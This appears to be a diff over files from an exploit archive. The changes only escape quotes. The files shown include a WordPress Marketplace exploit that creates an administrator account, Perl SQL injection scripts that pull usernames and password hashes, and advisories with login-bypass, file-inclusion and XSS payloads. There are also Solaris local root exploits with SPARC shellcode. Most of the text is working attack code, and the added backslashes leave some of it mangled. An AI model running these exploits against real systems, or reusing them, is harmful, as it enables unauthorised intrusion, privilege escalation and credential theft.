+#		    call_user_func($_POST[\'execute\'],$_POST);
 #	    else
-#		    echo __("function not defined!","wpmarketplace");
+#		    echo __(\"function not defined!\",\"wpmarketplace\");
 #	    die();
 #	  }
 #}
@ -25,8 +25,8 @@
 # Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook).
 # wpmp_pp_ajax_call() call functions by call_user_func() through POST data:
 #
-#         if (function_exists($_POST['execute']))
+#         if (function_exists($_POST[\'execute\']))
-#             call_user_func($_POST['execute'], $_POST);
+#             call_user_func($_POST[\'execute\'], $_POST);
 #         else
 #         ...
 #         ...
@ -61,7 +61,7 @@
 #
 # ---------------------------------------------------------------------
 #
-# Dork google:  index of "wpmarketplace"
+# Dork google:  index of \"wpmarketplace\"
 #
 # Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6
 #
@ -76,8 +76,8 @@ import optparse
 # Check url
 def checkurl(url):
-    if url[:8] != "https://" and url[:7] != "http://":
+    if url[:8] != \"https://\" and url[:7] != \"http://\":
-        print('[X] You must insert http:// or https:// procotol')
+        print(\'[X] You must insert http:// or https:// procotol\')
        sys.exit(1)
    else:
        return url
@ -85,29 +85,29 @@ def checkurl(url):
 # Check if file exists and has readable
 def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
-        print '[X] '+file+' file is missing or not readable'
+        print \'[X] \'+file+\' file is missing or not readable\'
        sys.exit(1)
    else:
        return file
 def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
-    return ''.join(random.choice(chars) for _ in range(size))
+    return \'\'.join(random.choice(chars) for _ in range(size))
-banner = """
+banner = \"\"\"
    ___ ___               __                                         
   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.           
   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|           
-   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|           
+   |. / \\  |_____|__| |_____|   __|__| |_____|_____|_____|           
   |:      |                |__|                                     
   |::.|:. |                                                         
-   `--- ---'                                                         
+   `--- ---\'                                                         
       ___ ___            __          __         __                  
      |   Y   .---.-.----|  |--.-----|  |_.-----|  .---.-.----.-----.
      |.      |  _  |   _|    <|  -__|   _|  _  |  |  _  |  __|  -__|
-      |. \_/  |___._|__| |__|__|_____|____|   __|__|___._|____|_____|
+      |. \\_/  |___._|__| |__|__|_____|____|   __|__|___._|____|_____|
      |:  |   |                           |__|                       
      |::.|:. |                                                      
-      `--- ---'                                                      
+      `--- ---\'                                                      
                                                          WP Marketplace
                                                      R3m0t3 C0d3 Ex3cut10n
                                                         (Add WP Admin)
@ -126,14 +126,14 @@ banner = """
                      https://twitter.com/homelabit
                    https://plus.google.com/+HomelabIt1/
           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
-"""
+\"\"\"
-commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
+commandList = optparse.OptionParser(\'usage: %prog -t URL [--timeout sec]\')
-commandList.add_option('-t', '--target', action="store",
+commandList.add_option(\'-t\', \'--target\', action=\"store\",
-                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
+                  help=\"Insert TARGET URL: http[s]://www.victim.com[:PORT]\",
                  )
-commandList.add_option('--timeout', action="store", default=10, type="int",
+commandList.add_option(\'--timeout\', action=\"store\", default=10, type=\"int\",
-                  help="[Timeout Value] - Default 10",
+                  help=\"[Timeout Value] - Default 10\",
                  )
 options, remainder = commandList.parse_args()
@ -154,30 +154,30 @@ socket.setdefaulttimeout(timeout)
 username = id_generator()
 pwd = id_generator()
-body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call',
+body = urllib.urlencode({\'action\' : \'wpmp_pp_ajax_call\',
-                         'execute' : 'wp_insert_user',
+                         \'execute\' : \'wp_insert_user\',
-                         'user_login' : username,
+                         \'user_login\' : username,
-                         'user_pass' : pwd,
+                         \'user_pass\' : pwd,
-                         'role' : 'administrator'})
+                         \'role\' : \'administrator\'})
-headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
+headers = {\'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\'}
-print "[+] Tryng to connect to: "+host
+print \"[+] Tryng to connect to: \"+host
 try:
-    req = urllib2.Request(host+"/", body, headers)
+    req = urllib2.Request(host+\"/\", body, headers)
    response = urllib2.urlopen(req)
    html = response.read()
-    if html == "":
+    if html == \"\":
-       print("[!] Account Added")
+       print(\"[!] Account Added\")
-       print("[!] Location: "+host+"/wp-login.php")
+       print(\"[!] Location: \"+host+\"/wp-login.php\")
-       print("[!] Username: "+username)
+       print(\"[!] Username: \"+username)
-       print("[!] Password: "+pwd)
+       print(\"[!] Password: \"+pwd)
    else:
-       print("[X] Exploitation Failed :(")
+       print(\"[X] Exploitation Failed :(\")
 except urllib2.HTTPError as e:
-    print("[X] "+str(e))
+    print(\"[X] \"+str(e))
 except urllib2.URLError as e:
-    print("[X] Connection Error: "+str(e))
+    print(\"[X] Connection Error: \"+str(e))
--- a/platforms/php/webapps/3729.txt
+++ b/platforms/php/webapps/3729.txt
@ -1,8 +1,8 @@
  .      .        .  
 ._ | _.  .|_  _. _.;_/
-[_)|(_]\_|[ )(_](_.| \.net
+[_)|(_]\\_|[ )(_](_.| \\.net
 |      ._|            
-"QDBlog v0.4 - MULTIPLE VULNERABILITIES"
+\"QDBlog v0.4 - MULTIPLE VULNERABILITIES\"
 	by Omni
 1) Infos
@ -29,8 +29,8 @@ Team            : Playhack.net Security
 [ authenticate.php Script - Line 7 - 9 ]
-$sql = "SELECT permissions, username FROM $prefix"."auth WHERE username = '" . $_POST['username'] . "' AND password =
+$sql = \"SELECT permissions, username FROM $prefix\".\"auth WHERE username = \'\" . $_POST[\'username\'] . \"\' AND password =
-MD5('".$_POST['wordpass']."');";
+MD5(\'\".$_POST[\'wordpass\'].\"\');\";
 	$query = mysql_query($sql, $conn);
@ -42,7 +42,7 @@ properly sanitized before being used, so an attacker can inject SQL code and gai
 --- [ PoC ] ---
 ===============
-Put in the username field (in login.php) a code like 1' OR '1' = '1' # and in the password filed what you want.
+Put in the username field (in login.php) a code like 1\' OR \'1\' = \'1\' # and in the password filed what you want.
 Click.. login and.. have fun :D  
 --- [ Local File Inclusion ] ---
@ -53,7 +53,7 @@ index.php as shown below:
 [ categories.php script - Line 2 ]
-include("themes/$theme/cat_top.php");
+include(\"themes/$theme/cat_top.php\");
 [ end index.php script ]
@ -67,9 +67,9 @@ http://remote_host/qdblog/categories.php?theme=../../../../../../../etc/passwd%0
 Take again a look to categories.php:
-in this file there is "an other vulnerability", File Traversal:
+in this file there is \"an other vulnerability\", File Traversal:
-   Line 3 : $file1 = fopen("themes/$theme/cat_mid.html", "r");
+   Line 3 : $file1 = fopen(\"themes/$theme/cat_mid.html\", \"r\");
--- a/platforms/php/webapps/40637.txt
+++ b/platforms/php/webapps/40637.txt
@ -0,0 +1,40 @@
 Source: https://github.com/XiphosResearch/exploits/tree/master/Joomraa
 While analysing the recent Joomla exploit in com_users:user.register we came across a problem with the upload whitelisting. They don't allow files containing <?php, or with the extensions .php and .phtml, but they do allow <?= and .pht files, which works out of the box on most hosting environments, including the standard Ubuntu LAMP install, as per:
 <FilesMatch ".+\.ph(p[345]?|t|tml)$">
    SetHandler application/x-httpd-php
 </FilesMatch>
 Usage
 Choose the username, password and e-mail address to use and point it at the URL for your Joomla website. Use the -x and -s options to customise exploit behaviour, -s searches for the given string in the output after running the PHP file (specified in -x), an example is provided which proves remote code execution.
 $ ./joomraa.py -u hacker -p password -e hacker@example.com http://localhost:8080/joomla 
     @@@   @@@@@@    @@@@@@   @@@@@@@@@@   @@@@@@@    @@@@@@    @@@@@@   @@@  
     @@@  @@@@@@@@  @@@@@@@@  @@@@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@@  @@@  
     @@!  @@!  @@@  @@!  @@@  @@! @@! @@!  @@!  @@@  @@!  @@@  @@!  @@@  @@!  
     !@!  !@!  @!@  !@!  @!@  !@! !@! !@!  !@!  @!@  !@!  @!@  !@!  @!@  !@   
     !!@  @!@  !@!  @!@  !@!  @!! !!@ @!@  @!@!!@!   @!@!@!@!  @!@!@!@!  @!@  
     !!!  !@!  !!!  !@!  !!!  !@!   ! !@!  !!@!@!    !!!@!!!!  !!!@!!!!  !!!  
     !!:  !!:  !!!  !!:  !!!  !!:     !!:  !!: :!!   !!:  !!!  !!:  !!!       
 !!:  :!:  :!:  !:!  :!:  !:!  :!:     :!:  :!:  !:!  :!:  !:!  :!:  !:!  :!:  
 ::: : ::  ::::: ::  ::::: ::  :::     ::   ::   :::  ::   :::  ::   :::   ::  
 : :::     : :  :    : :  :    :      :     :   : :   :   : :   :   : :  :::  
 [-] Getting token
 [-] Creating user account
 [-] Getting token for admin login
 [-] Logging in to admin
 [+] Admin Login Success!
 [+] Getting media options
 [+] Setting media options
 [*] Uploading exploit.pht
 [*] Uploading exploit to: http://localhost:8080/joomla/images/OGBUHCF5F.pht
 [*] Calling exploit
 [$] Exploit Successful!
 [*] SUCCESS: http://localhost:8080/joomla
 Full Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40637.zip
--- a/platforms/php/webapps/4135.pl
+++ b/platforms/php/webapps/4135.pl
@ -4,26 +4,26 @@
 #
 require LWP::UserAgent;
-print "#
+print \"#
 # phpEventCalendar <= v0.2.3 SQL Injection Exploit
 # By Iron - ironwarez.info
 # Thanks to Silentz for the help :)
 # Greets to everyone at RootShell Security Group & dHack
 #
 # Example target url: http://www.target.com/phpeventcalendar/
-Target url?";
+Target url?\";
 chomp($target=<stdin>);
-if($target !~ /^http:\/\//)
+if($target !~ /^http:\\/\\//)
 {
-	$target = "http://".$target;
+	$target = \"http://\".$target;
 }
-if($target !~ /\/$/)
+if($target !~ /\\/$/)
 {
-	$target .= "/";
+	$target .= \"/\";
 }
-print "User id to retrieve name/password from? (1 = admin)";
+print \"User id to retrieve name/password from? (1 = admin)\";
 chomp($target_id=<stdin>);
-$target .= "eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=".$target_id;
+$target .= \"eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=\".$target_id;
 $ua = LWP::UserAgent->new;
 $ua->timeout(10);
@ -33,20 +33,20 @@ $response = $ua->get($target);
 if ($response->is_success)
 {
-	if($response->content =~ /<span class="display_header">(.*)<\/span>/i)
+	if($response->content =~ /<span class=\"display_header\">(.*)<\\/span>/i)
 	{
 		($username,$password) = split(/,/,$1);
-		print "Username: ".$username;
+		print \"Username: \".$username;
-		print "\nPassword: ".$password;
+		print \"\\nPassword: \".$password;
 	}
 	else
 	{
-		print "\nUnable to retrieve username/password.";
+		print \"\\nUnable to retrieve username/password.\";
 	}
 }
 else
 {
- die "Error: ".$response->status_line;
+ die \"Error: \".$response->status_line;
 }
 # milw0rm.com [2007-07-01]
--- a/platforms/php/webapps/5696.pl
+++ b/platforms/php/webapps/5696.pl
@ -26,52 +26,52 @@
 ########################################
 #----------------------------------------------------------------------------#
 ########################################
-system("color 02");
+system(\"color 02\");
-print "\t\t############################################################\n\n";
+print \"\\t\\t############################################################\\n\\n\";
-print "\t\t#   PHP Booking Calendar 10 d - Remote SQL Inj Exploit     #\n\n";
+print \"\\t\\t#   PHP Booking Calendar 10 d - Remote SQL Inj Exploit     #\\n\\n\";
-print "\t\t#                         by Stack                         #\n\n";
+print \"\\t\\t#                         by Stack                         #\\n\\n\";
-print "\t\t############################################################\n\n";
+print \"\\t\\t############################################################\\n\\n\";
 ########################################
 #----------------------------------------------------------------------------#
 ########################################
 use LWP::UserAgent;
-die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
+die \"Example: perl $0 http://victim.com/path/\\n\" unless @ARGV;
-system("color f");
+system(\"color f\");
 ########################################
 #----------------------------------------------------------------------------#
 ########################################
 #the username of  news manages
-$user="username";
+$user=\"username\";
 #the pasword of  news manages
-$pass="passwd";
+$pass=\"passwd\";
 #the tables of news manages
-$tab="booking_user";
+$tab=\"booking_user\";
-$fil="details_view.php";
+$fil=\"details_view.php\";
-$varo="event_id";
+$varo=\"event_id\";
 ########################################
 #----------------------------------------------------------------------------#
 ########################################
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+$b->agent(\'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\');
 ########################################
 #----------------------------------------------------------------------------#
 ########################################
-$host = $ARGV[0] . "/".$fil."?".$varo."=-1+union+all+select+1,1,concat_ws(char(58),char(58),".$user.",char(58),char(58),char(58),char(58)),1,1,1,1,1,1,".$pass.",1,1,1 from+".$tab."/*";
+$host = $ARGV[0] . \"/\".$fil.\"?\".$varo.\"=-1+union+all+select+1,1,concat_ws(char(58),char(58),\".$user.\",char(58),char(58),char(58),char(58)),1,1,1,1,1,1,\".$pass.\",1,1,1 from+\".$tab.\"/*\";
 $res = $b->request(HTTP::Request->new(GET=>$host));
 $answer = $res->content;
 ########################################
 #----------------------------------------------------------------------------#
 ########################################
 if ($answer =~ /::(.*?)::::/){
-        print "\nBrought to you by v4-team.com...\n";
+        print \"\\nBrought to you by v4-team.com...\\n\";
-        print "\n[+] Admin User : $1";
+        print \"\\n[+] Admin User : $1\";
 }
 ########################################
 #----------------------------------------------------------------------------#
 ########################################
-if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
+if ($answer =~/([0-9a-fA-F]{32})/){print \"\\n[+] Admin Hash : $1\\n\\n\";
-print "\t\t#   Exploit has ben aported user and password hash   #\n\n";}
+print \"\\t\\t#   Exploit has ben aported user and password hash   #\\n\\n\";}
-else{print "\n[-] Exploit Failed...\n";}
+else{print \"\\n[-] Exploit Failed...\\n\";}
 ########################################
 #-------------------Exploit exploited by Stack --------------------#
 ########################################
--- a/platforms/php/webapps/5870.txt
+++ b/platforms/php/webapps/5870.txt
@ -18,13 +18,13 @@
 ####################
 2. Vulnerabilities:
 ####################
-    2.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter.
+    2.1. Local File Inclusion (LFI) in \"/functions.php\" in \"FORUM_LANGUAGE\" parameter.
        2.1.1. Exploit:
                        Check the exploit/POC section.
    2.2. File (image) Upload without premission.
        2.2.1. Exploit:
                        Check the exploit/POC section.
-    2.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php".
+    2.3. Cross Site Scripting (XSS). Reflected XSS attack in \"search.php\".
        2.3.1. Exploit:
                        Check the exploit/POC section.
@ -32,7 +32,7 @@
 3. Exploits/POCs:
 ####################
    Original Exploit URL: http://bugreport.ir/index.php?/46/exploit
-    3.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter.
+    3.1. Local File Inclusion (LFI) in \"/functions.php\" in \"FORUM_LANGUAGE\" parameter.
        -------------
        LFI:
            http://[URL]/[Forum Path]/functions.php?FORUM_LANGUAGE=/../../../../../../../../../../etc/passwd
@ -42,15 +42,15 @@
        Uploader link:
            http://[URL]/[Forum Path]/upload.php
        -------------
-    3.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php".
+    3.3. Cross Site Scripting (XSS). Reflected XSS attack in \"search.php\".
        -------------
-            <form action="http://[URL]/[Forum path]/search.php" method="post">
+            <form action=\"http://[URL]/[Forum path]/search.php\" method=\"post\">
            <tr><td class=g>XSS: <small></td><tr>
            &quot;&lt;SCRIPT&gt;alert(/BugReport.ir-XSS/.source)&lt;/SCRIPT&gt;
-            <br><tr><td class=g><INPUT TYPE="text" class="txt" NAME="search" SIZE="30" MAXLENGTH="100"><br/>
+            <br><tr><td class=g><INPUT TYPE=\"text\" class=\"txt\" NAME=\"search\" SIZE=\"30\" MAXLENGTH=\"100\"><br/>
-            <tr><td class=g><INPUT TYPE="RADIO" checked NAME="type" VALUE="themen">&nbsp;search only in topics</td></tr>
+            <tr><td class=g><INPUT TYPE=\"RADIO\" checked NAME=\"type\" VALUE=\"themen\">&nbsp;search only in topics</td></tr>
-            <tr><td class=g><INPUT TYPE="RADIO" NAME="type" VALUE="beitraege">&nbsp;search in topics and answers</td></tr>
+            <tr><td class=g><INPUT TYPE=\"RADIO\" NAME=\"type\" VALUE=\"beitraege\">&nbsp;search in topics and answers</td></tr>
-            <INPUT TYPE="SUBMIT" class="btn" NAME="submit" VALUE="submit"></td></tr>
+            <INPUT TYPE=\"SUBMIT\" class=\"btn\" NAME=\"submit\" VALUE=\"submit\"></td></tr>
        -------------
 ####################
 4. Solution:
--- a/platforms/solaris/local/197.c
+++ b/platforms/solaris/local/197.c
@ -26,23 +26,23 @@
 #define NOP     0xac15a16e
-#define VULPROG "/usr/bin/eject"
+#define VULPROG \"/usr/bin/eject\"
-char shellcode[] =      /* from scz's funny shellcode for SPARC */
+char shellcode[] =      /* from scz\'s funny shellcode for SPARC */
-    "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"  /* setuid(0)  */
+    \"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\"  /* setuid(0)  */
-    "\xaa\x1d\x40\x15\x90\x05\x60\x01\x92\x10\x20\x09"  /* dup2(1,2)  */
+    \"\\xaa\\x1d\\x40\\x15\\x90\\x05\\x60\\x01\\x92\\x10\\x20\\x09\"  /* dup2(1,2)  */
-    "\x94\x05\x60\x02\x82\x10\x20\x3e\x91\xd0\x20\x08"
+    \"\\x94\\x05\\x60\\x02\\x82\\x10\\x20\\x3e\\x91\\xd0\\x20\\x08\"
-    "\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29"
+    \"\\x20\\x80\\x49\\x73\\x20\\x80\\x62\\x61\\x20\\x80\\x73\\x65\\x20\\x80\\x3a\\x29\"
-    "\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
+    \"\\x7f\\xff\\xff\\xff\\x94\\x1a\\x80\\x0a\\x90\\x03\\xe0\\x34\\x92\\x0b\\x80\\x0e\"
-    "\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
+    \"\\x9c\\x03\\xa0\\x08\\xd0\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc\\xc0\\x2a\\x20\\x07\"
-    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
+    \"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01\"
-    "\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";
+    \"\\x91\\xd0\\x20\\x08\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\";
 /* get current stack point address */
 long get_sp(void)
 {
-    __asm__("mov %sp,%i0");
+    __asm__(\"mov %sp,%i0\");
 }
 /* prints a long to a string */
@ -78,14 +78,14 @@ void create_shellbuf(char* shellbuf, int align, int retloc)
    /* check align parameter */
    if (align < 0 || align > 3) {
-        printf("Error: align is %d, it should be between 0 and 3\n", align);
+        printf(\"Error: align is %d, it should be between 0 and 3\\n\", align);
        exit(1);
    }
    /* check retloc parameter */
    if (contains_zero(retloc) || contains_zero(retloc+2) ) {
-        printf("Error: retloc (0x%x) or retloc+2 (0x%x) contains a zero byte\n", retloc, retloc+2);
+        printf(\"Error: retloc (0x%x) or retloc+2 (0x%x) contains a zero byte\\n\", retloc, retloc+2);
        exit(1);
    }
@ -127,7 +127,7 @@ void create_shellbuf(char* shellbuf, int align, int retloc)
    /* at this point the shell buffer should be exactly SHELL bytes long, including the null-terminator */
    if (strlen(shellbuf) + 1 != SHELL) {
-        printf("Error: The shell buffer is %d bytes long. It should be %d bytes. Something went terribly wrong...\n",
+        printf(\"Error: The shell buffer is %d bytes long. It should be %d bytes. Something went terribly wrong...\\n\",
                strlen(shellbuf)+1, SHELL);
        exit(1);
    }
@ -145,32 +145,32 @@ void execute_vulnprog(char* pattern, char* shellbuf)
    /* create message files */
    if (strlen(pattern) > 512) {
-        printf("Warning: The pattern is %d bytes long. Only the first 512 bytes will be used.\n", strlen(pattern));
+        printf(\"Warning: The pattern is %d bytes long. Only the first 512 bytes will be used.\\n\", strlen(pattern));
    }
-    if ( !(fp = fopen("messages.po", "w+")) ) {
+    if ( !(fp = fopen(\"messages.po\", \"w+\")) ) {
-        perror("Error openning messages.po for writing.");
+        perror(\"Error openning messages.po for writing.\");
        exit(1);
    }
-    fprintf(fp, "domain \"messages\"\n");
+    fprintf(fp, \"domain \\\"messages\\\"\\n\");
-    fprintf(fp, "msgid  \"usage: %%s [-fndq] [name | nickname]\\n\"\n");
+    fprintf(fp, \"msgid  \\\"usage: %%s [-fndq] [name | nickname]\\\\n\\\"\\n\");
-    fprintf(fp, "msgstr \"%s\\n\"", pattern);
+    fprintf(fp, \"msgstr \\\"%s\\\\n\\\"\", pattern);
    fclose(fp);
-    system("/usr/bin/msgfmt messages.po");
+    system(\"/usr/bin/msgfmt messages.po\");
-    system("cp messages.mo SUNW_OST_OSCMD");
+    system(\"cp messages.mo SUNW_OST_OSCMD\");
-    system("cp messages.mo SUNW_OST_OSLIB");
+    system(\"cp messages.mo SUNW_OST_OSLIB\");
    /* prepere the environment for the VULNPROG process */
-    env[0] = "NLSPATH=:.";
+    env[0] = \"NLSPATH=:.\";
    env[1] = shellbuf;              /* put the shellbuf in env */
    env[2] = NULL;                  /* end of env */
    /* execute the vulnerable program using our custom environment */
-    execle(VULPROG, VULPROG, "-x", NULL, env);
+    execle(VULPROG, VULPROG, \"-x\", NULL, env);
 }
@ -178,18 +178,18 @@ void execute_vulnprog(char* pattern, char* shellbuf)
 void usage(char *prg)
 {
-    printf("Usage:\n");
+    printf(\"Usage:\\n\");
-    printf("    %s [command] [options]\n\n", prg);
+    printf(\"    %s [command] [options]\\n\\n\", prg);
-    printf("Commands:\n");
+    printf(\"Commands:\\n\");
-    printf("  dump                   Dumps the stack\n");
+    printf(\"  dump                   Dumps the stack\\n\");
-    printf("  shell                  Dumps the shell buffer\n");
+    printf(\"  shell                  Dumps the shell buffer\\n\");
-    printf("  exploit                Exploits /usr/bin/eject\n\n");
+    printf(\"  exploit                Exploits /usr/bin/eject\\n\\n\");
-    printf("Options:\n");
+    printf(\"Options:\\n\");
-    printf("  --num=96               Number of words to dump from the stack\n");
+    printf(\"  --num=96               Number of words to dump from the stack\\n\");
-    printf("  --align=2              Sets the alignment (0, 1, 2 or 3)\n");
+    printf(\"  --align=2              Sets the alignment (0, 1, 2 or 3)\\n\");
-    printf("  --shellofs=-6          Offset of the shell buffer\n");
+    printf(\"  --shellofs=-6          Offset of the shell buffer\\n\");
-    printf("  --retlocofs=-4         Retloc adjustment (must be divisible by 4)\n");
+    printf(\"  --retlocofs=-4         Retloc adjustment (must be divisible by 4)\\n\");
-    printf("  --retloc=0xeffffa3c    Location of the return address\n");
+    printf(\"  --retloc=0xeffffa3c    Location of the return address\\n\");
    exit(0);
 }
@ -212,20 +212,20 @@ main(int argc, char **argv)
        usage(argv[0]);
    }
-    if (!strncmp(argv[1], "dump", 4)) { dump = 1; }
+    if (!strncmp(argv[1], \"dump\", 4)) { dump = 1; }
-    else if(!strncmp(argv[1], "shell", 5)) { shell = 1; }
+    else if(!strncmp(argv[1], \"shell\", 5)) { shell = 1; }
-    else if(!strncmp(argv[1], "exploit", 7)) { exploit = 1; }
+    else if(!strncmp(argv[1], \"exploit\", 7)) { exploit = 1; }
    else {
        usage(argv[0]);
    }
    for (i = 2; i < argc; i++) {
-        if ( (sscanf(argv[i], "--align=%d", &align) ||
+        if ( (sscanf(argv[i], \"--align=%d\", &align) ||
-              sscanf(argv[i], "--num=%d", &num) ||
+              sscanf(argv[i], \"--num=%d\", &num) ||
-              sscanf(argv[i], "--shellofs=%d", &shellofs) ||
+              sscanf(argv[i], \"--shellofs=%d\", &shellofs) ||
-              sscanf(argv[i], "--retlocofs=%d", &retlocofs) ||
+              sscanf(argv[i], \"--retlocofs=%d\", &retlocofs) ||
-              sscanf(argv[i], "--retloc=%x", &retloc))== 0) {
+              sscanf(argv[i], \"--retloc=%x\", &retloc))== 0) {
-                printf("Unrecognized option %s\n\n", argv[i]);
+                printf(\"Unrecognized option %s\\n\\n\", argv[i]);
                usage(argv[0]);
            }
    }
@ -243,54 +243,54 @@ main(int argc, char **argv)
    /* sh_add now points to the beginning of the shell buffer */
-    printf("Calculated shell buffer address: 0x%x\n", sh_addr);
+    printf(\"Calculated shell buffer address: 0x%x\\n\", sh_addr);
    if (shell == 1) {
        put_long(&shellbuf[align], sh_addr);        /* put sh_addr on the stack */
    }
    if ( ((sh_addr + align) & 0xfffffffc) != (sh_addr + align) ) {
-        printf("Warning: sh_addr + align must be word aligned. Adjust shellofs and align as neccessary\n");
+        printf(\"Warning: sh_addr + align must be word aligned. Adjust shellofs and align as neccessary\\n\");
    }
    if (retloc == RETLOC) {                         /* if retloc was not specified on the command line, calculate it */
        retloc = sh_addr + align - num*4 + retlocofs;
-        printf("Calculated retloc: 0x%x\n", retloc);
+        printf(\"Calculated retloc: 0x%x\\n\", retloc);
        put_long(&shellbuf[align+4], retloc);
        put_long(&shellbuf[align+12], retloc+2);
    }
    jmp_addr = (sh_addr + align) + 64;              /* Calculate the shell jump location */
-    printf("Calculated shell code jump location: 0x%x\n\n", jmp_addr);
+    printf(\"Calculated shell code jump location: 0x%x\\n\\n\", jmp_addr);
    /* create the format string */
    ptr = pattern;
    for (i = 0; i < num; i++) {
-        memcpy(ptr, "%.8x", 4);
+        memcpy(ptr, \"%.8x\", 4);
        ptr = ptr + 4;
    }
    if (dump == 1) {
        *ptr = 0;                                   /* null-terminate */
-        printf("Stack dump mode, dumping %d words\n", num);
+        printf(\"Stack dump mode, dumping %d words\\n\", num);
    }
    else if (shell == 1) {
-        sprintf(ptr, " Shell buffer: %%s");
+        sprintf(ptr, \" Shell buffer: %%s\");
-        printf("shellbuf (length = %d): %s\n\n", strlen(shellbuf)+1, shellbuf);
+        printf(\"shellbuf (length = %d): %s\\n\\n\", strlen(shellbuf)+1, shellbuf);
-        printf("Shell buffer dump mode, shell buffer address is 0x%x\n", sh_addr);
+        printf(\"Shell buffer dump mode, shell buffer address is 0x%x\\n\", sh_addr);
    }
    else {
        reth = (jmp_addr >> 16) & 0xffff;
        retl = (jmp_addr >> 0) & 0xffff;
-        sprintf(ptr, "%%%uc%%hn%%%uc%%hn", (reth - num * 8), (retl - reth));
+        sprintf(ptr, \"%%%uc%%hn%%%uc%%hn\", (reth - num * 8), (retl - reth));
-        printf("Exploit mode, jumping to 0x%x\n", jmp_addr);
+        printf(\"Exploit mode, jumping to 0x%x\\n\", jmp_addr);
    }
-    printf("num: %d\t\talign: %d\tshellofs: %d\tretlocofs: %d\tretloc: 0x%x\n\n",
+    printf(\"num: %d\\t\\talign: %d\\tshellofs: %d\\tretlocofs: %d\\tretloc: 0x%x\\n\\n\",
            num, align, shellofs, retlocofs, retloc);
    /* execute the vulnerable program using our custom environment */
--- a/platforms/solaris/local/20186.c
+++ b/platforms/solaris/local/20186.c
@ -23,11 +23,11 @@ It should be noted under Linux this problem must be exploited in conjunction wit
 * Tested in Solaris 2.6/7.0 (If it wont work, try adjust retloc offset. e.g. 
 * ./ex -o -4 )
 *
- * $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'`
+ * $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e \'s/^.lib\\([_0-9a-zA-Z]*\\)\\.so.*/-l\\1/\'`
 * usages: ./ex -h
 *
 * Thanks for Ivan Arce <iarce@core-sdi.com> who found this bug.
- * Thanks for horizon's great article about defeating noexec stack for Solaris.
+ * Thanks for horizon\'s great article about defeating noexec stack for Solaris.
 *
 * THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN
 * ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.
@ -44,20 +44,20 @@ It should be noted under Linux this problem must be exploited in conjunction wit
 #define BUFSIZE 2048                    /* the size of format string buffer*/
 #define BUFF    128                     /* the progname buffer size */
-#define SHELL   "/bin/ksh"              /* shell name */
+#define SHELL   \"/bin/ksh\"              /* shell name */
 #define DEFAULT_NUM 68                  /* format strings number */
 #define DEFAULT_RETLOC 0xffbefb44       /* default retloc address */
-#define VULPROG  "/usr/bin/passwd"      /* vulnerable program name */
+#define VULPROG  \"/usr/bin/passwd\"      /* vulnerable program name */
 void usages(char *progname)
 {
        int i;
-        printf("Usage: %s \n", progname);
+        printf(\"Usage: %s \\n\", progname);
-        printf("          [-h]             Help menu\n");
+        printf(\"          [-h]             Help menu\\n\");
-        printf("          [-n number]      format string's number\n");
+        printf(\"          [-n number]      format string\'s number\\n\");
-        printf("          [-a align]       retloc buffer alignment\n");
+        printf(\"          [-a align]       retloc buffer alignment\\n\");
-        printf("          [-o offset]      retloc offset\n\n");
+        printf(\"          [-o offset]      retloc offset\\n\\n\");
 }
@ -65,7 +65,7 @@ void usages(char *progname)
 long get_sp(void)
 {
-        __asm__("mov %sp,%i0");
+        __asm__(\"mov %sp,%i0\");
 }
@ -97,22 +97,22 @@ main( int argc, char **argv )
